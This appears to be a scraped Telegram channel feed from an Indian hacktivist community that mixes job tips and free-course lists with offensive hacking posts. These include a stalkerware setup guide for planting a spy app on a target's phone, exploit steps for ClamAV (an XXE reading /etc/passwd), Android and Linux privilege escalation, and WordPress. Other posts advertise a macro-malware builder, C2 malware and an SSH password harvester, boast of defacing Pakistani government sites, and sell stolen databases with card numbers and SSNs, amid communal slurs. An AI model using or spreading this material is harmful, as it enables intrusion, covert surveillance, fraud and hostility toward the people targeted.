✅ Guide for Freshers ✅Here are some tips that can help a fresher get a job easily:🔠Build a strong resume: Your resume is the first thing that employers see, so make sure it is well-written and highlights your key skills and experiences.🔠Network: Reach out to alumni, professors, colleagues, and other professionals in your field. Attend job fairs, networking events, and career expos to get exposure to potential employers.🔠Apply for internships: Internships are a great way to gain work experience and make valuable connections. Apply for internships in your field to gain practical knowledge.🔠Focus on your skills: Employers look for candidates who have relevant skills for the job. Focus on developing skills specific to your field and showcase them in your resume and interviews.🔠Prepare for job interviews: Research the company, dress appropriately, and rehearse answers to common interview questions. Show that you are enthusiastic about the job and willing to learn.🔠Be open to opportunities: Don't limit yourself to only applying for jobs that are exactly what you are looking for. Be open to job opportunities that may not be the exact fit to your skill set, it may open doors for future opportunities.✔️Maintain 5 important skills✔️✅Leadership Skills ✅Technical Skills ✅Communication Skills ✅Managerial Skills ✅Problem Solving Skills 💰Top Companies to join as a fresher💰✔️Google✔️Amazon✔️Bain & Company✔️PayPal✔️Microsoft✔️IBM✔️Cidint✔️Open Ai✔️Adobe✔️Cisco✔️Stripe✔️Roblox✔️Nvidia✔️Coinbase
2023-05-29 05:53:52
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Blind XSS 🫣𝙇𝙞𝙣𝙠:𝙋𝙡𝙚𝙖𝙨𝙚 𝙎𝙝𝙖𝙧𝙚 𝙮𝙤𝙪𝙧 𝙑𝙞𝙚𝙬𝙨 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏. 𝙏𝙝𝙖𝙣𝙠𝙨 𝙚𝙫𝙚𝙧𝙮𝙤𝙣𝙚 𝙛𝙤𝙧 𝙮𝙤𝙪𝙧 𝙜𝙧𝙚𝙖𝙩 𝙎𝙪𝙥𝙥𝙤𝙧𝙩🙌☺️
2023-05-29 05:34:36
Kripya @protocolnick ke liye aisi ladki dhundhne ki kripa kareAapki ati kripa hogiDhanyawadLadki milne par inbox kare aapki inaam rashi turant paye
2023-05-27 11:29:30
Link: DOM-XSS Vulnerability 😍
2023-05-25 17:39:01
Best ChatGPT Alternatives to finish hours of work in seconds 𝗙𝗼𝗿 𝗪𝗿𝗶𝘁𝗶𝗻𝗴 ChatSonic - ChatABC - JasperAI - Quillbot - 𝗙𝗼𝗿 𝗖𝗼𝗱𝗶𝗻𝗴 Copilot- Tabnine - MutableAI - Safurai - 10Web - 𝗙𝗼𝗿 𝗥𝗲𝘀𝗲𝗮𝗿𝗰𝗵 Paperpal - Perplexity - YouChat - Elicit - 𝗙𝗼𝗿 𝗧𝘄𝗶𝘁𝘁𝗲𝗿 Tweetmonk - Tribescaler - Postwise - TweetLify - 𝗙𝗼𝗿 𝗣𝗿𝗼𝗱𝘂𝗰𝘁𝗶𝘃𝗶𝘁𝘆 Synthesia - Otter - Bardeen - CopyAI - 𝗙𝗼𝗿 𝗖𝗼𝗻𝘁𝗲𝗻𝘁 𝗖𝗿𝗲𝗮𝘁𝗶𝗼𝗻 WriteSonic - Tome - CopySmith - TextBlaze - 𝗥𝗲𝘀𝘂𝗺𝗲 𝗕𝘂𝗶𝗹𝗱𝗲𝗿𝘀 KickResume - ReziAI - ResumeAI - EnhanceCV - 𝗙𝗼𝗿 𝗣𝗿𝗲𝘀𝗲𝗻𝘁𝗮𝘁𝗶𝗼𝗻𝘀 BeautifulAI - Simplified - Slidesgo - Sendsteps - 𝗙𝗼𝗿 𝗔𝘂𝗱𝗶𝗼 MurfAI - Speechify - LovoAI- MediaAI-
2023-05-24 15:09:02
2023-05-24 05:40:15
2023-05-24 04:55:50
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSS. 𝙇𝙞𝙣𝙠:✨🙌
2023-05-24 04:46:20
2023-05-23 05:39:18
🪩Gallery & SMS Spy App🪩✅Telegram based Android App✅ Send photos/SMS to TG Bot✅ Fully undetetable ( GalleryEye)🟢 Same Setup for SmsEye▫️ SmsEye Spy App not FUD
2023-05-23 05:39:04
Unveiling the Gallery & SMS Spy App: Setup and Installation GuideIntroduction:In the world of technology, privacy and security are of paramount importance. For various reasons, individuals may find themselves needing to monitor and protect their personal data, particularly their photo gallery and SMS communications. The Gallery & SMS Spy App, an Android application accessible through Telegram, offers a comprehensive solution for monitoring and safeguarding these aspects of your digital life. This guide will walk you through the setup and installation process, ensuring a seamless experience with the app.App Overview:The Gallery & SMS Spy App leverages the capabilities of Telegram to provide a powerful and discreet method of monitoring your photo gallery and SMS messages. Key features of this app include:1. Telegram Integration: The app operates within the Telegram messaging platform, making it easily accessible and convenient for users.2. Photo and SMS Transfer: Users can send photos and SMS messages directly to the Telegram bot associated with the app, allowing for monitoring and storage of this data.3. Undetectability (GalleryEye): The GalleryEye module of the app is designed to operate discreetly, ensuring that your photo gallery remains hidden and secure.4. SmsEye Functionality: The SmsEye module provides the ability to monitor SMS messages, although it is worth noting that it may not be fully undetectable.Setup and Installation:Follow these steps to set up and install the Gallery & SMS Spy App:1. Telegram Account: If you don't already have one, create an account on Telegram (available on Android and iOS) and log in.2. Download App Files: Visit the provided link or source for the Gallery & SMS Spy App (please exercise caution when obtaining apps from unofficial sources).3. Bot Creation: In Telegram, search for "BotFather" and create a new bot by following the provided instructions. Note down the generated bot token.4. App Configuration: Open the app files you downloaded and locate the configuration file. Edit it using a text editor and enter your bot token in the designated field.5. App Installation: Install the modified app file on the target Android device. Ensure that the device allows installations from unknown sources by enabling the "Unknown Sources" option in the device settings.6. Launch the App: Open the installed app on the target device. Follow any on-screen prompts or instructions to complete the setup process.7. Linking with the Bot: Once the app is launched, link it to the Telegram bot you created by providing the necessary credentials.8. Sending Photos and SMS: You can now begin using the app by sending photos and SMS messages to the associated Telegram bot. This will allow you to monitor and store this data securely.Note of Caution:It is crucial to respect the privacy and legal considerations of individuals when using such apps. Ensure that you have proper authorization to monitor or access someone's photo gallery or SMS messages. Misuse or unethical use of this app may infringe upon privacy rights and potentially violate local laws.Conclusion:The Gallery & SMS Spy App offers a convenient and discreet means of monitoring and protecting your photo gallery and SMS communications. By following the setup and installation process outlined in this guide, you can leverage the app's features to enhance your privacy and security. Remember to use this app responsibly, respecting the privacy and legal boundaries of others. Safeguard your digital life effectively and ethically with the Gallery & SMS Spy App.
2023-05-22 05:41:59
𝙓𝙎𝙎 𝘼𝙪𝙩𝙤𝙢𝙖𝙩𝙞𝙤𝙣 😍✨XSS automation offers efficient and accurate detection of cross-site scripting vulnerabilities, saving time and resources compared to manual testing methods.𝙇𝙞𝙣𝙠: Share your Views ☺️🙌
2023-05-21 14:19:16
SSH Harvester | We get ssh passwords of users in plain text.Well, yes, yes, yes, a couple of years ago there was an article that, during authorization, the ssh server spawns 2 processes, on one of which the pass rolls in the clear, in fact, at this moment it is pulled out.In general, they put the script, fishing goes by itself
2023-05-20 16:12:08 DOM XSS Vulnerability easily😊
2023-05-20 14:17:01
https://portal.lics.pk #KeralaCyberXtractors #IndianCyberForce #NewWorldHacktivist #IndianDarknetAssociation#TEAMONEfourONE#UnknownCyberCult#AnonymousIndia#INDIANHACKERS
2023-05-20 04:50:33
🔥 Bad Spin : Android Binder LPEPrivilege escalation exploit from unstrusted_app for Android Binder vulnerability (CVE-2022-20421).Run from shell:1️⃣Compile the library by typing make push in the src/ directory. This will also push the library to /data/local/tmp.2️⃣Run adb shell.3️⃣Run LD_PRELOAD=/data/local/tmp/ sleep 1. This will load the library and start the exploit.Run from demo app:1️⃣Compile by typing make push in the src/ directory. This will copy the library to the assets directory for the demo Android app.2️⃣Compile the demo Android app in the app/ directory. (You might need Android Studio to do this.)3️⃣Run the app and click on the "Exploit" button.4️⃣Consume logs using: adb logcat -s BADSPINDownload
2023-05-20 04:46:49
CoercerA python script to automatically coerce a Windows server to authenticate on an arbitrary machine through 12 methods.
2023-05-19 17:10:02
Join for Premium Courses for FREE @nocostcourses
2023-05-19 15:11:48
CVE-2023-21554 Windows MessageQueuing PoCDownload
2023-05-19 13:35:15
Scada system of Chemical factory of porkis has been compromised by Team 1-4-1 🇮🇳
2023-05-19 12:10:15
Team insane right now😂
2023-05-19 03:11:09
2023-05-18 10:52:49
Windows UAC Bypass ScriptDownload
2023-05-18 08:08:44
2023-05-18 08:08:16
OEBuilder | Hack Using Excel And DocOEBuilder uunique assembly, crypter and macro generator for stitching your bootloader into the doc file. The software is very convenient and understandable.Features:*Fake Error*UAC Bypass*Add password to doc*add text*USG*DOC*XLS*Silent add ons
2023-05-18 04:38:20
2023-05-17 18:08:55
gg's hacker's ( I love you —❤️ ‼️Here we go again here we go again 🎉#OSINT1₾ Visual Ping web page monitoring service, helps to track of changes on any particular website. ( hourly/everyday )2₾ All the internet combines results from different search engines and social media.3₾ izito searches and combines all Search Engines! Yahoo, Microsoft Bing, YouTube, Wikipedia, Entireweb etc...#exploit1. CVE-2023-1586:Avast Anti-Virus privileged arbitrary file create on virus restore and as always #hacker_bano_chutiya_nhe 😍😍
2023-05-17 16:02:38
CVE-2023-32243 | wordpressEssential Addons for Elementor 5.4.0-5.7.1 - Unauthenticated Privilege Escalationusage: [-h] -u URL -p PASSWORD [-usr USERNAME] Download Exploit
2023-05-17 13:49:00
username ims0rry password racoon
2023-05-17 12:37:05
web2shellA Python program used to automate converting webshells into reverse shells. If you regularly do CTF, HTB, or red teaming you've probably spent a good chunk of time testing payloads to convert a webshell into a reverse shell. This tool aims to simplify this process.
2023-05-17 04:52:36
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚 : Reflected XSS𝙇𝙞𝙣𝙠:
2023-05-17 03:47:31
2023-05-16 19:55:40
Best Online MD5 Encryption & Decryption Tools #pentesting #cryptography
2023-05-16 17:31:37
g's hacker's ( its a bad day for me but —❤️ ‼️Here we go again Microsoft is scanning the inside of password-protected zip files for malware read_more#hacker_bano_chutiya_nhe 😤
2023-05-16 16:52:05
XSS where you can inject the payload within the image file name and alert!.𝙇𝙞𝙣𝙠:
2023-05-16 16:31:33
How to save all post in private from public channel Using bot Post credit @its_me_dollar@Deadlymalwarexpbot
2023-05-16 11:50:22
💥 PoC for CVE-2023-32233(tested under Ubuntu 23.04)Once the PoC is started on a vulnerable system, it may leave that system in an unstable state with corrupted kernel memory. We strongly recommend to test the PoC on a dedicated system to avoid potential data corruptions.Download:
2023-05-16 11:37:27
2023-05-16 06:42:55
🔥NETGEAR Routers: A Playground for Hackers?Overall, the security posture of custom binaries built by NETGEAR contained many vulnerabilities, largely due to the widespread usage of insecure C functions such as strcpy, strcat, sprintf, or from off-by-one errors. However, the majority of the binaries on the NETGEAR router were compiled with many protections in place, including stack canaries, non-executable stack (NX), position-independent code (PIE) and address layout randomization (ASLR) enabled. These protections made many of the vulnerabilities identified difficult to exploit on their own.Content:💾 Summary💾 Advisories💾 Vulnerabilities 💽 Telnet 📀 PSV-2023-0008 – Telnet Default Account Privilege Escalation Breakout 💽 Web Application 📀 PSV-2022-???? – JSON Response Stack Data Leak 💽 SOAP Service 📀 PSV-2023-0009 – Write HTTP Response Stack Pointer Leak 📀 PSV-2022-???? – SOAPAction Stack Buffer Overflow 📀 PSV-2023-0010 – HTTP Body Off-By-One NULL Terminator Stack Canary Corruption 📀 PSV-2023-0011 – HTTP Protocol Stack Buffer Overflow 📀 PSV-2023-0012 – SOAP Parameters Stack Buffer Overflow💾 Conclusion
2023-05-16 05:33:08
XSS where you can inject the payload within the image file name and alert!.𝙇𝙞𝙣𝙠:
2023-05-16 00:11:18
2023-05-15 05:21:26
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: DOM based XSSLink: Share your Views 🙏🏻☺️ & Subscribe to our YouTube channel for more Videos. Really Thank you for your Support😊🙌
2023-05-15 02:07:07
MagSpoofA portable device that can spoof/emulate any magnetic stripe, credit card or hotel card "wirelessly", even on standard magstripe (non-NFC/RFID) readers. It can disable Chip&PIN and predict AMEX card numbers with 100% accuracy.
2023-05-14 15:48:53
10+ PK government websites h*-cked.A perfect payback to pk from #indiancybertroopshttps://cmdu.gob(.pk)/ (.pk)/index.php (.pk)/ (.pk)/https://demo.cmdu.gob (.pk)/https://pphi.cmdu.gob (.pk)/ https://ekacheri.cmdu.gob (.pk)/https://hubportal.cmdu.gob (.pk)/ https://rds.cmdu.gob (.pk)/https://test.cmdu.gob (.pk)/ (.pk)/
2023-05-14 12:57:08
2023-05-14 12:53:26
​​Kovid RootkitA full-feature LKM intended for use against Linux kernel v5+. #pentesting #redteam
2023-05-14 12:52:20
​​badsecretsA library for detecting known secrets across many web frameworks. #infosec #pentesting
2023-05-14 11:14:52
2023-05-14 06:07:11
Jai Shree Ram 🔥
2023-05-14 05:40:53
Happy Mother's Day.
2023-05-14 05:39:28
❗️🇵🇰 After 51 yrs PTI Chairman & Ex-PM of Pakistan Imran Khan admits the truth of East Pak (now Bangladesh) & blames Pak Army by saying Mujibur Rahman after winning the election should have been the PM but Pak Army did crackdown instead & end up losing with 90K POWs & humiliation
2023-05-14 01:36:27
Om hari hari, jai shree ram 🙏
2023-05-13 15:38:15
SITE URL - - id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=1' AND 9657=9657-- kGMXKHUD KE DESH KI SECURITYB SAMBHALO PEHLE CHUTIYO 😂😂HACKED BY -CYBER DEMONS INDIA 🇮🇳JAY SHREE RAAM 🤒🙏🇮🇳❤️❤️
2023-05-13 14:29:29
wpfinger | WordPress scanning tool.• Core version detection• Plugin scanning through fingerprinting• Vulnerability output, using database from Wordfence
2023-05-12 01:37:51
2023-05-11 15:18:44
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSS𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠 : Share your views&𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏🏻𝙏𝙝𝙖𝙣𝙠𝙨 𝙛𝙤𝙧 𝙮𝙤𝙪𝙧 𝙎𝙪𝙥𝙥𝙤𝙧𝙩. ☺️
2023-05-11 12:20:01
BIG ⚡️⚡️ Leaked Recording 🚨 Another Hassan Siddiqui from Pak Armed Forces exposed themselves !!
2023-05-11 00:31:39
2023-05-10 14:04:17
CHIT CHAT ON SOC 👽 WITH @abhinavkakku ( SOC ANALYST) BHAIYA AT @cyberdemonsindiaaTIME - 8:00 PM TODAY ( AFTER HALF AN HOUR ) #hacker_bano_chutiya_nahi 👌
2023-05-10 13:06:39
💥CVE-2023-20052 exploitTo create malicious DMG file:$ git clone$ cd CVE-2023-20052$ sudo docker build -t cve-2023-20052 .$ sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash$ genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg$ bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmgTo trigger exploit:$ clamscan --debug exploit.dmg
2023-05-10 08:29:37
A large number of protestors from Khyber Pakhtunkhwa have reached near the Police lines H-11 in Islamabad, carrying guns and sticks.Videos haven't coming out yet due to media and internet blackout.
2023-05-10 08:23:12
Pakistan under Martial Law.Today at Multiple locations Pakistan Army opened fire on PTI protestors and killed many civilians in Pakistan.
2023-05-10 08:10:00
Report on Situation in PakistanAll characters mentioned above in video are fictional...
2023-05-10 04:58:11
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Host Header Injection𝙇𝙞𝙣𝙠:𝙋𝙡𝙚𝙖𝙨𝙚 𝙇𝙞𝙠𝙚 & 𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏☺️
2023-05-10 01:18:42
MeliziaC2DNS over HTTPS targeted malware (only runs once)• Auto-delete malware on failure• Fully encrypted (per victim RSA key) DoH (DNS-over-HTTPS) communication• Malware only runs once!
2023-05-10 01:13:04
SpiderSuiteAn advance cross-platform and multi-feature GUI web spider/crawler for cyber security proffesionals. Spider Suite can be used for attack surface mapping and analysis
2023-05-10 00:20:42
❓WHAT DO WE HAVE IN PRIVATE❓❓ PRIVATE SECTOR DATABASE ❓It contains 133475 Filesking of Databaseprivate Sector all post =187837Today all(Date:09/05/2023)Unlimited data uploadingEvery day 😊😘😍Photos and videos 21023Photos 19254Videos 1769Files 133475Links 39345💻DATABASES 710+TB OVER DATABASE -bank data (90GB+) -Russian Major cities (Moscow, St. Petersburg, Rostov, ETC) -Ukraine (Gov, Residents, Major Cities, ETC)MORE DATA AVAILABLE ETC,ETC •SOCIAL MEDIAS: -VK -TELEGRAM -TWITTER -FACEBOOK -ETC -PASSPORTS -Snapchat - more social media database uploaded Government data -930 post pan Card adhar card - 1630 web site with Data post SSN 150+ BIG FILE UPLOADED MILLION OF DATABASE SSN -💀LOGS💀 (❗️5594 fils SEPERATE ARCHIVES, EACH WEIGHT TENS OF GIGABYTES❗️)NUMBER|DATE|CVC|BANK|FULL NAME|ADDRESS|COUNTRY|INDEX|PHONE NUMBER|MAIL|DOB|SSN|MMN💵PRICE💵ONE WEEK 24$ (40% DISCOUNT always )Old price 40$CONTACT: @Algorithm2botREPLY WITH BOT MASSAGEMaxx escrow accepted
2023-05-09 16:10:59
2023-05-09 13:03:58
🔥Linux kernel io_uring out-of-bounds access to physical memory( commit 776617d " io_uring/rsrc: check for nonconsecutive pages" )A bug in the fixed buffer registration code for io_uring (io_sqe_buffer_register in io_uring/rsrc.c) allows OOB access to physical memory beyond the end of the buffer. This can be used to achieve full LPE.Bug reproduction steps(PoC exploit attached):1️⃣ Create a memfd2️⃣ fallocate a single page in that file descriptor3️⃣ Use MAP_FIXED to map this page repeatedly, in consecutive locations4️⃣ Register the entire region that you just filled up with that page as a fixed buffer with IORING_REGISTER_BUFFERS5️⃣ Use IORING_OP_WRITE_FIXED to write the buffer to some other file (OOB read) or IORING_OP_READ_FIXED to read data into the buffer (OOB write).compile exploit:💾normal:gcc -Wall -Wextra -std=gnu17 -Os -s exploit.c -luring -o exploit💾static:gcc -Wall -Wextra -std=gnu17 -static -Os -s exploit.c liburing.a -o exploitDownload Exploit:
2023-05-09 13:00:34
𝙃𝙚𝙖𝙙𝙚𝙧 𝙗𝙖𝙨𝙚𝙙 𝙎𝙌𝙇 𝙄𝙣𝙟𝙚𝙘𝙩𝙞𝙤𝙣 𝘿𝙚𝙩𝙚𝙘𝙩𝙞𝙤𝙣 𝙏𝙤𝙤𝙡𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠: 𝙇𝙞𝙣𝙠:
2023-05-09 07:51:44
Join our group for Exclusive Cyber Security
2023-05-09 05:56:32
𝘼𝙠𝙖𝙢𝙖𝙞 𝙒𝘼𝙁 𝘽𝙮𝙥𝙖𝙨𝙨 𝙋𝙖𝙮𝙡𝙤𝙖𝙙𝙇𝙞𝙣𝙠:
2023-05-08 13:56:55
🔥CVE-2021-38001: A Brief Introduction to V8 Inline Cache and Exploitating Type Confusion + BlogCVE-2021-38001 as a type confusion bug(issue happened in V8’s inline cache and can result in RCE) requires some basic knowledge on what an inline cache is, and how it works in v8.Download:
2023-05-08 05:42:00
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚: Stored XSSCourse Link: Share your views &𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏🏻𝙏𝙝𝙖𝙣𝙠𝙨 𝙛𝙤𝙧 𝙮𝙤𝙪𝙧 𝙎𝙪𝙥𝙥𝙤𝙧𝙩. ☺️
2023-05-08 05:40:52
Congress's Telangana manifesto that every Karnataka voter must listen to.▪️All government contracts to Muslim youths.▪️20 lakh financial aid to poor Muslim students.▪️Residential schools for Muslims only.▪️Hospitals for minorities only.▪️Free electricity supply to Masjid and Churches.
2023-05-07 01:30:16
Offensive Web Testing FrameworkOWASP OWTF is a project focused on penetration testing efficiency and alignment of security tests to security standards like the OWASP Testing Guide (v3 and v4), the OWASP Top 10, PTES and NIST...
2023-05-06 14:11:15
SQLI [SQL INJECTION] ATTACK TUTORIAL (USED IN DB BREACHING)Forum post (dorks) :- HereBy @Devil_AnonO.s :- LinuxTool used :- JSQLWhat is SQLI (SQL INJECTION) ❓SQL injection, also known as SQLI, is a common attack vector that uses malicious SQL code for backend database manipulation to access information that was not intended to be displayed. This information may include any number of items, including sensitive company data, user lists or private customer details.Share➡️and support✅@cyberhellcommunity
2023-05-06 13:30:54
phpMyAdmin ExploitExploit Title : phpMyAdmin 5.1.1 - XSS (Cross-site Scripting)Affected Versions : phpMyAdmin versions of the 5.1 branch prior to 5.1.2 are affected.
2023-05-06 09:23:08
2023-05-06 08:45:50
Chad Jaishankar 🔥
2023-05-06 06:59:27
Explore the FREE SQL resources that jump-started my career and can boost yours too!A lot of people have asked me about the best places to learn SQL, so I've put together a list of free tools that helped me a lot.I really like having a step-by-step plan for learning, and these resources make it easy and fun to keep going.𝗙𝗼𝗿 𝗳𝗿𝗲𝗲 𝗿𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀:🔸🔸 Programming with Mosh:🔸 techTFQ:🔸 Alex the Analyst:𝗔𝗱𝗱𝗶𝘁𝗶𝗼𝗻𝗮𝗹 𝗳𝗿𝗲𝗲 𝗿𝗲𝘀𝗼𝘂𝗿𝗰𝗲𝘀:🔸 SQLBolt:🔸 SQLZoo:🔸 SQLTest:🔸🔸 Codecademy:𝗧𝗼 𝗽𝗿𝗮𝗰𝘁𝗶𝗰𝗲:🔸 LeetCode:🔸 HackerRank:🔸 DataLemur: https://datalemur.com𝗙𝗼𝗿 𝗳𝘂𝗻 𝗴𝗮𝗺𝗲𝘀 𝗼𝗻 𝗦𝗤𝗟:🔸 SQLZOO:🔸 SQLBOLT:🔸 SQL Murder Mystery: hope these resources help you learn and master SQL in a fun and engaging way. Good luck on your journey!🌟 Enjoying my content? Stay in the loop! 🌟---------
2023-05-06 03:23:11
BHEH's XSSRocketXSS Rocket is written by Black Hat Ethical Hacking with the help of #ChatGPT as experimentation, with a lot of hours spent modifying the code generated by ChatGPT, and is designed for Offensive Security and XSS (Cross-Site Scripting) attacks.
2023-05-05 19:48:22
2023-05-05 14:29:17
XXE Attack Host: I*****TTime : 8Pm TodayAT @cyberdemonsindiaa
2023-05-05 04:32:14
2023-05-05 03:54:43
bangladesh religious education.. that's how a terrorist born.. don't ask for reasons.. or people/religious stuff will be exposed badly 🥺
2023-05-05 00:59:58
​​Hash MuncherGrab NetNTLMv2 hashes using ETW with administrative rights on Windows.
2023-05-04 22:04:08
Join our group for Exclusive Cyber security
2023-05-04 20:37:33
Free API Course (Premium Quality) !Save 1000s of dollars.Seize this incredible opportunity!Bookmark this page and dive into my curated curriculum.Eager to learn API?Discover an all-inclusive API courses tailored just for you - at no cost!13 free lessons to get you interview-ready and move ahead of 90% of people.Immerse yourself in top-notch tutorials for designing, developing and testing APIs – all meticulously crafted to turbocharge your skillset!🙏 Help me spread these free courses: like, share and comment!Follow these steps in the specified order to ensure success: 1. API and REST API Fundamentals - 2. API Methods - 3. API Terminologies - 4. API Authentication - 5. API Status Codes - 6. REST API vs GraphQL - 7. API Integration - 8. API Testing - 9. API with Python - 10. API Scaling - 11. Designing and Developing Robust APIs - 12. Designing APIs with Postman- 13. Testing APIs with Postman - to take your APIs skills to the next level?Try these free Premium quality courses to see immediate results.
2023-05-04 20:19:41
FREE Cybersecurity Courses! Save 1000s of dollars. You asked, and I listened! 📣 Presenting a list of FREE cybersecurity courses just for you! 💻 Seize this incredible opportunity! Bookmark this page and dive into my curated curriculum. Eager to learn Cybersecurity? Discover an all-inclusive Cybersecurity courses tailored just for you - at no cost! 29 free lessons to get you interview-ready and move ahead of 90% of people. Immerse yourself in top-notch tutorials and certifications – all meticulously crafted to turbocharge your skillset! 🙏 Help me spread these free courses: like, share and comment! 🔐1. Intro to Information Security by Udacity: 🔐2. Network Security by Udacity: 🔐3. Introduction to Cybersecurity: 🔐4. Cybersecurity Essentials: 🔐5. Networking Essentials: 🔐6. NSE 1,2 & 3: 🔐7. Information Security by OpenLearn: 🔐8. Network Security by OpenLearn: 🔐9. Risk Management by Open Learn: 🔐10. Certified in Cybersecurity℠ - CC: 🔐11. CCNA Security Courses: 🔐12. Network Defense Essentials (NDE): 🔐13. Ethical Hacking Essentials (EHE): 🔐14. Digital Forensics Essentials (DFE): 🔐15. Dark Web, Anonymity, and Cryptocurrency: 🔐16. Digital Forensics by Open Learn: 🔐17. AWS Cloud Certifications (Cybersecurity): 🔐18. Microsoft Learn for Azure: 🔐19. Google Cloud Training: 🔐20. Android Bug Bounty Hunting: Hunt Like a Rat: 🔐21. Vulnerability Management: 🔐22. Software Security: 🔐23. Developing Secure Software: 🔐24. PortSwigger Web Hacking: 🔐25. RedTeaming: 🔐26. Splunk: 🔐27. Secure Software Development: 🔐28. Maryland Software Security: 🔐29. Stanford Cyber Resiliency: 🌟 Enjoying my content? Stay in the loop! 🌟
2023-05-04 18:46:36
Israel camera 🖕
2023-05-04 18:46:35
discount 😉
2023-05-04 17:23:43
🇪🇸Laravel Scanner 🇪🇸-={SHELL, SMTP, AWS, TWILIO, SSH, NEXMO, PERFECTMONEY, DB,ENV}=- 🇨🇳💰Price :150$💎VIPMember : 100$For buy : @Hajit00n
2023-05-04 07:51:11
𝙈𝙖𝙨𝙨 𝙃𝙪𝙣𝙩𝙞𝙣𝙜 𝘽𝙡𝙞𝙣𝙙 𝙓𝙎𝙎. 𝙇𝙞𝙣𝙠:
2023-05-04 06:11:45
Join krlo guys
2023-05-04 05:02:23
WhatsApp OSINT ToolLogs online/offline events from ANYONE in the world.
2023-05-04 04:58:13
DNSReconDnsrecon is one of the popular scripts in the security community which is used for reconnaissance on domains. This script is written in python language.This script checks all the DNS records for AXFR which can be useful for a security researcher for DNS enumeration on all types of records such as SOA, NS, TXT, SVR, SPF, etc.
2023-05-03 22:30:53
2023-05-03 15:51:10
Telegram-0day-exploit-pocZero Day revshell exploit tool for Remote Code Execution vulnerability found in Telegram's bot api broadcast_msg api call.Usage:python -u [TELEGRAM USER] -i [IP HERE] -p [PORT HERE]Download:
2023-05-03 15:48:22
Signal-zeroday-exploitSignal RCE vulnerability found in contact exchange APIUsage:python -t [TARGET PHONE #] -i [IP HERE] -p [PORT HERE]Download:
2023-05-03 04:45:44
𝘼𝙪𝙩𝙝𝙚𝙣𝙩𝙞𝙘𝙖𝙩𝙞𝙤𝙣 𝙫𝙨 𝘼𝙪𝙩𝙝𝙤𝙧𝙞𝙯𝙖𝙩𝙞𝙤𝙣𝙇𝙞𝙣𝙠:𝙨𝙝𝙖𝙧𝙚𝙎𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡 𝙛𝙤𝙧 𝙢𝙤𝙧𝙚 𝙪𝙥𝙘𝙤𝙢𝙞𝙣𝙜 𝘾𝙮𝙗𝙚𝙧 𝙎𝙚𝙘𝙪𝙧𝙞𝙩𝙮 𝙑𝙞𝙙𝙚𝙤𝙨 🙏
2023-05-01 04:48:57
PASS : INDIAISYOURDADGreetz to All Indian Hackers Jai Hind 🇮🇳@BlackDragonSec
2023-05-01 04:47:46
𝘽𝙪𝙜 𝙏𝙮𝙥𝙚 : Reflected XSS𝙋𝙡𝙚𝙖𝙨𝙚 𝙨𝙪𝙗𝙨𝙘𝙧𝙞𝙗𝙚 𝙩𝙤 𝙤𝙪𝙧 𝙔𝙤𝙪𝙏𝙪𝙗𝙚 𝙘𝙝𝙖𝙣𝙣𝙚𝙡🙏𝘾𝙤𝙪𝙧𝙨𝙚 𝙇𝙞𝙣𝙠:☺️🙌
2023-04-30 01:19:36
Trap , brainwash And Transform
2023-04-29 12:03:29
MITM (MAN-IN-THE-MIDDLE) ATTACK PROPAGATION :- ETTERCAP & BeEF FRAMEWORKForum post :- HereBy @Devil_AnonO.s :- LinuxTools used :- Ettercap & BeEfWhat is a MITM ATTACK❔A man-in-the-middle (MiTM) attack is a type of cyber attack in which the attacker secretly intercepts and relays messages between two parties who believe they are communicating directly with each other. The attack is a type of eavesdropping in which the attacker intercepts and then controls the entire conversation. share➡️ and promote✅@cyberhellcommunity
2023-04-29 07:50:11
Watch latest movies and Get Free Courses on https://neplix.streamFeatures of Neplix1. Free Movies2. Less Ads3. Free Courses4. Request for Movies
2023-04-28 18:25:20 this blog I have mentioned:-1.What truly osint stands for2. Difference between Digital Forensics and OSint3. The correct approach for osint4. Place to learn the techniques of OSint5. Jobs where osint is used as a skillThis may be helpful for both intermediate and beginners.also suggest me for any edits.
2023-04-28 14:55:34
Public This Mother Fucker 🖕 Images
2023-04-28 14:55:25
❗️Scammer 🚫@MohammedKairz Images Images Images
2023-04-28 14:55:13
😄 312 Turkish Passports Leaked By 🇪🇸 @LegionLeaker 🇪🇸 Images
2023-04-28 10:34:38
